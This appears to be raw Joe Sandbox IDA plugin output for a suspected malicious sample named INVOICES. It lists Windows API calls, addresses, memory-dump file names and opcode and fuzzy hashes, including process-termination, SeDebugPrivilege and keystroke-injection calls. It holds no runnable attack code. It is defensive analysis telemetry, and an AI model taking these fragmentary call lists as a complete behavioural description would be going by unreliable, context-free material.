                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ChildEnumWindows
                                                                                                                                  • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                  • API String ID: 3555792229-1603158881
                                                                                                                                  • Opcode ID: 5913e10ae68f61459cbc8be6f2c9e169cb499ef67c67c958d11ceb58ac3fc71c
                                                                                                                                  • Instruction ID: 237cc6127c743014f39343a4fa2bc6566f15e870f81a76af2ed386af42720383
                                                                                                                                  • Opcode Fuzzy Hash: 5913e10ae68f61459cbc8be6f2c9e169cb499ef67c67c958d11ceb58ac3fc71c
                                                                                                                                  • Instruction Fuzzy Hash: 1091F570A00646FBEB18EF64C4C5BEDFB74BF04310F14812AE859A7152DF386999DBA1
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 00732EAE
  • Part of subcall function 00731DB3: GetClientRect.USER32(?,?), ref: 00731DDC
  • Part of subcall function 00731DB3: GetWindowRect.USER32(?,?), ref: 00731E1D
  • Part of subcall function 00731DB3: ScreenToClient.USER32(?,?), ref: 00731E45
• GetDC.USER32 ref: 0076CEB2
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0076CEC5
• SelectObject.GDI32(00000000,00000000), ref: 0076CED3
• SelectObject.GDI32(00000000,00000000), ref: 0076CEE8
• ReleaseDC.USER32(?,00000000), ref: 0076CEF0
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0076CF7B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
• Opcode ID: 4f593af35cfe8dc73a31d14028ffd749c9b576e322f9f4de97e7e469d55e9310
• Instruction ID: bbfeea877e02564d34fa7e47e1f48c0d72f444319cdacb19e58f0a529868ee91
• Opcode Fuzzy Hash: 4f593af35cfe8dc73a31d14028ffd749c9b576e322f9f4de97e7e469d55e9310
• Instruction Fuzzy Hash: FC71A031500205DFDF229F64CC89AFA7BB6FF49360F14826AED965A266C7398C41DF60
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,?,007BF910), ref: 007A8E3D
• FreeLibrary.KERNEL32(00000000,00000001,00000000,?,007BF910), ref: 007A8E71
• QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 007A8FEB
• SysFreeString.OLEAUT32(?), ref: 007A9015
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Free$FileLibraryModuleNamePathQueryStringType
• String ID:
• API String ID: 560350794-0
• Opcode ID: f30687dfeb0acb1eae2aadfcc1c09e52a0f1793b10ade7af7a356f4d15700acd
• Instruction ID: b40106d109c17a458376974d4447c03bbe9e94bbd403ec311d2aa3f6b0a52937
• Opcode Fuzzy Hash: f30687dfeb0acb1eae2aadfcc1c09e52a0f1793b10ade7af7a356f4d15700acd
• Instruction Fuzzy Hash: C9F17D71A00209EFDF04DF94C888EAEB7B9FF8A314F108598F915AB251DB35AE45CB51
APIs
• _memset.LIBCMT ref: 007AF7C9
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007AF95C
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007AF980
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007AF9C0
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007AF9E2
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007AFB5E
• GetLastError.KERNEL32(00000000,00000001,00000000), ref: 007AFB90
• CloseHandle.KERNEL32(?), ref: 007AFBBF
• CloseHandle.KERNEL32(?), ref: 007AFC36
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
• String ID:
• API String ID: 4090791747-0
• Opcode ID: 7979b3788c41c03e3d1f57232e99fbb9259fa48da2c3e681e40276a1bcad7b14
• Instruction ID: ec0142b896ee55407a0cc715aa16443efc0524ce4f457f1493c422c97c788d53
• Opcode Fuzzy Hash: 7979b3788c41c03e3d1f57232e99fbb9259fa48da2c3e681e40276a1bcad7b14
• Instruction Fuzzy Hash: DCE1D831204300DFC714EF74C895B6ABBE1AF86354F14856DF8899B2A2DB78EC45CB52
APIs
  • Part of subcall function 00731B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00732036,?,00000000,?,?,?,?,007316CB,00000000,?), ref: 00731B9A
• DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 007320D3
• KillTimer.USER32(-00000001,?,?,?,?,007316CB,00000000,?,?,00731AE2,?,?), ref: 0073216E
• DestroyAcceleratorTable.USER32(00000000), ref: 0076BE26
• DeleteObject.GDI32(00000000), ref: 0076BE9C
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID:
• API String ID: 2402799130-0
• Opcode ID: be0af644a1c7f245cf924a56c18b117af146d5a327b23cd35c0af481e423bdc2
• Instruction ID: 8265e93e7b02ec37855fb67e244b966a693d267111672d928414fe1b599f3313
• Opcode Fuzzy Hash: be0af644a1c7f245cf924a56c18b117af146d5a327b23cd35c0af481e423bdc2
• Instruction Fuzzy Hash: EA617C31100A10DFEB39AF14DD48B2AB7F1FB40712F508529E6428B972C77DA896DB94
APIs
  • Part of subcall function 007946AF: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007936DB,?), ref: 007946CC
  • Part of subcall function 007946AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007936DB,?), ref: 007946E5
  • Part of subcall function 00794AD8: GetFileAttributesW.KERNEL32(?,0079374F), ref: 00794AD9
• lstrcmpiW.KERNEL32(?,?), ref: 00794DE7
• _wcscmp.LIBCMT ref: 00794E01
• MoveFileW.KERNEL32(?,?), ref: 00794E1C
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
• String ID:
• API String ID: 793581249-0
• Opcode ID: 3ebe6160a5bf5b85875cb6ae6195e439e971d7e95ae7f1d00320b63d7afca140
• Instruction ID: 17e816e354bf9c8bd827d2d8b59252fee2fa06c44e4d2c4531359ca339472673
• Opcode Fuzzy Hash: 3ebe6160a5bf5b85875cb6ae6195e439e971d7e95ae7f1d00320b63d7afca140
• Instruction Fuzzy Hash: 5F5141B20083859BCB24EB94D885DDFB7ECAF85301F04492EF585D3152EE78A68D8756
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 007B8731
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
• Opcode ID: c471546250d55f12f9fd90d1b3f4ad3102a96efac941835c371fb07a3d56a249
• Instruction ID: 1487ce8a7cc620bf5dda60375b7659db771622d9b3cd30fd3e5338954ec032d3
• Opcode Fuzzy Hash: c471546250d55f12f9fd90d1b3f4ad3102a96efac941835c371fb07a3d56a249
• Instruction Fuzzy Hash: D751B070510204FFEB609B69CC89FE93B6CEB05724F604556FA15E61E2CF79E980CB52
                                                                                                                                  APIs
                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0076C477
                                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0076C499
                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0076C4B1
                                                                                                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0076C4CF
                                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0076C4F0
                                                                                                                                  • DestroyCursor.USER32(00000000), ref: 0076C4FF
                                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0076C51C
                                                                                                                                  • DestroyCursor.USER32(?), ref: 0076C52B
                                                                                                                                    • Part of subcall function 007BA4E1: DeleteObject.GDI32(00000000), ref: 007BA51A
Memory Dump Source
• Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CursorDestroyExtractIconImageLoadMessageSend$DeleteObject
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2975913752-0
                                                                                                                                  • Opcode ID: 78c381635b780e919edd0abc9c0b347f14fd37f6bfc9b41bc9242f058cdfcea1
                                                                                                                                  • Instruction ID: d904c56956830515de5a85ca9234bfc3b896ef739823bf26ba4e0078bfe617a5
                                                                                                                                  • Opcode Fuzzy Hash: 78c381635b780e919edd0abc9c0b347f14fd37f6bfc9b41bc9242f058cdfcea1
                                                                                                                                  • Instruction Fuzzy Hash: B6515D70610209EFEB24DF24DC45FBA7BB5EB58720F204628F94297292DB78ED51DB60
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0078AC37: GetWindowThreadProcessId.USER32(?,00000000), ref: 0078AC57
                                                                                                                                    • Part of subcall function 0078AC37: GetCurrentThreadId.KERNEL32 ref: 0078AC5E
                                                                                                                                    • Part of subcall function 0078AC37: AttachThreadInput.USER32(00000000,?,00789945,?,00000001), ref: 0078AC65
                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00789950
                                                                                                                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0078996D
                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00789970
                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00789979
                                                                                                                                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00789997
                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0078999A
                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 007899A3
                                                                                                                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 007899BA
                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007899BD
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2014098862-0
                                                                                                                                  • Opcode ID: 158cb696079e3ce66252fc6c4708527c5fe3d3896a4f44c71072bce37e44d166
                                                                                                                                  • Instruction ID: 74a5c8a058781000a889d3935091d1e24d99660fa30934fe960f9141aeca72c6
                                                                                                                                  • Opcode Fuzzy Hash: 158cb696079e3ce66252fc6c4708527c5fe3d3896a4f44c71072bce37e44d166
                                                                                                                                  • Instruction Fuzzy Hash: 4A11CEB1950218FEF6106B64CC89F6A7B2DEB4CB55F114529F644AB0A0C9FA6C109BA8
                                                                                                                                  APIs
                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00788864,00000B00,?,?), ref: 00788BEC
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00788864), ref: 00788BF3
                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00788864,00000B00,?,?), ref: 00788C08
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00788864,00000B00,?,?), ref: 00788C10
                                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,00788864,00000B00,?,?), ref: 00788C13
                                                                                                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00788864,00000B00,?,?), ref: 00788C23
                                                                                                                                  • GetCurrentProcess.KERNEL32(00788864,00000000,?,00788864,00000B00,?,?), ref: 00788C2B
                                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,00788864,00000B00,?,?), ref: 00788C2E
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,00788C54,00000000,00000000,00000000), ref: 00788C48
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1422014791-0
                                                                                                                                  • Opcode ID: 379f4abeea10506e5b5113a476669da562710ce078c9392ea0ca3a29e9967e41
                                                                                                                                  • Instruction ID: 26a3c6fadde1b911b516a1cf3187664def253afd9564e313422b633e7d216ad9
                                                                                                                                  • Opcode Fuzzy Hash: 379f4abeea10506e5b5113a476669da562710ce078c9392ea0ca3a29e9967e41
                                                                                                                                  • Instruction Fuzzy Hash: 1701ACB524034CFFE610AF69DC49F6B3B6CEB89B11F408521FA05DB191CA7498008B24
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$ClearInit$_memset
                                                                                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                  • API String ID: 2862541840-625585964
                                                                                                                                  • Opcode ID: 60185a3a5a560fe52d95fd84e99cdafacad198bdb10d8d04938ef273ed402ddb
                                                                                                                                  • Instruction ID: e019376ce47f51d8b9feb736ac6e21a8f31de03af824c2dcaf2aca47c0f51994
                                                                                                                                  • Opcode Fuzzy Hash: 60185a3a5a560fe52d95fd84e99cdafacad198bdb10d8d04938ef273ed402ddb
                                                                                                                                  • Instruction Fuzzy Hash: 82919271A00255EBDF24DFA5C844FAFB7B8EF8A710F108659F605AB280D7789905CFA0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00787432: CLSIDFromProgID.COMBASE ref: 0078744F
                                                                                                                                    • Part of subcall function 00787432: ProgIDFromCLSID.COMBASE(?,00000000), ref: 0078746A
                                                                                                                                    • Part of subcall function 00787432: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0078736C,80070057,?,?), ref: 00787478
                                                                                                                                    • Part of subcall function 00787432: CoTaskMemFree.COMBASE(00000000), ref: 00787488
                                                                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 007A991B
                                                                                                                                  • _memset.LIBCMT ref: 007A9928
                                                                                                                                  • _memset.LIBCMT ref: 007A9A6B
                                                                                                                                  • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000000), ref: 007A9A97
                                                                                                                                  • CoTaskMemFree.COMBASE(?), ref: 007A9AA2
                                                                                                                                  Strings
                                                                                                                                  • NULL Pointer assignment, xrefs: 007A9AF0
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                                  • String ID: NULL Pointer assignment
                                                                                                                                  • API String ID: 1300414916-2785691316
                                                                                                                                  • Opcode ID: 7724dc4b9cc83e0dedf3e7fe114752f6d2ffb2cef541b5b7c3b8ca26bb943a8a
                                                                                                                                  • Instruction ID: d9b0850c231ed3e586478c1441092256ae81c7a7b8199f58d036686ad3cc296d
                                                                                                                                  • Opcode Fuzzy Hash: 7724dc4b9cc83e0dedf3e7fe114752f6d2ffb2cef541b5b7c3b8ca26bb943a8a
                                                                                                                                  • Instruction Fuzzy Hash: 6F913B71D00219EBDB10DFA4DC85EDEBBB9EF49710F20825AF519A7241DB749A44CFA0
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 007B6E56
                                                                                                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 007B6E6A
                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007B6E84
                                                                                                                                  • _wcscat.LIBCMT ref: 007B6EDF
                                                                                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 007B6EF6
                                                                                                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 007B6F24
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window_wcscat
                                                                                                                                  • String ID: SysListView32
                                                                                                                                  • API String ID: 307300125-78025650
                                                                                                                                  • Opcode ID: 72c0a26bef54b03a6e8a5bfafd4fcced52dd24ffd7fa37e265ece8cbef069a95
                                                                                                                                  • Instruction ID: f01b91fe0945162a7ced1ebee6c3978a4de4c6663f01567cb938bbf85e6df45a
                                                                                                                                  • Opcode Fuzzy Hash: 72c0a26bef54b03a6e8a5bfafd4fcced52dd24ffd7fa37e265ece8cbef069a95
                                                                                                                                  • Instruction Fuzzy Hash: CD41B075A00308EFEF219F64CC89FEE77A8EF08754F10442AFA44E7291D2799D848B64
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00793C99: CreateToolhelp32Snapshot.KERNEL32 ref: 00793CBE
                                                                                                                                    • Part of subcall function 00793C99: Process32FirstW.KERNEL32(00000000,?), ref: 00793CCC
                                                                                                                                    • Part of subcall function 00793C99: CloseHandle.KERNEL32(00000000), ref: 00793D96
                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007AEAB8
                                                                                                                                  • GetLastError.KERNEL32 ref: 007AEACB
                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007AEAFA
                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 007AEB77
                                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 007AEB82
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 007AEBB7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                  • String ID: SeDebugPrivilege
                                                                                                                                  • API String ID: 2533919879-2896544425
                                                                                                                                  • Opcode ID: e7d29d61a356a2e6e9d808fc8be4e651b370e0802a3eaf07b73379aa7e2710e0
                                                                                                                                  • Instruction ID: 2143390a176c3887c0aec875de279564050483cf66d29b17ea1abb16a764594b
                                                                                                                                  • Opcode Fuzzy Hash: e7d29d61a356a2e6e9d808fc8be4e651b370e0802a3eaf07b73379aa7e2710e0
                                                                                                                                  • Instruction Fuzzy Hash: 9841BD71200201DFDB14EF28CC99F6DB7A5AF84714F088558F9469F2D2CBBDA804CB96
                                                                                                                                  APIs
                                                                                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 007930CD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: IconLoad
                                                                                                                                  • String ID: blank$info$question$stop$warning
                                                                                                                                  • API String ID: 2457776203-404129466
                                                                                                                                  • Opcode ID: 71859038e3b4d8c0b950bcc8c56b1101f5ba5ea6e27298f93cd9a870d5294ab5
                                                                                                                                  • Instruction ID: 6fc9b0b0e6adb7c3174f84443993ce83bce786507ce2042ce76b4598969d26a9
                                                                                                                                  • Opcode Fuzzy Hash: 71859038e3b4d8c0b950bcc8c56b1101f5ba5ea6e27298f93cd9a870d5294ab5
                                                                                                                                  • Instruction Fuzzy Hash: 9C112B35608347BADB205B59EC83DBA779DDF09760F20402AF908661C2DEBD9F0146A5
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00794353
                                                                                                                                  • LoadStringW.USER32(00000000), ref: 0079435A
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00794370
                                                                                                                                  • LoadStringW.USER32(00000000), ref: 00794377
                                                                                                                                  • _wprintf.LIBCMT ref: 0079439D
                                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007943BB
                                                                                                                                  Strings
                                                                                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 00794398
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp
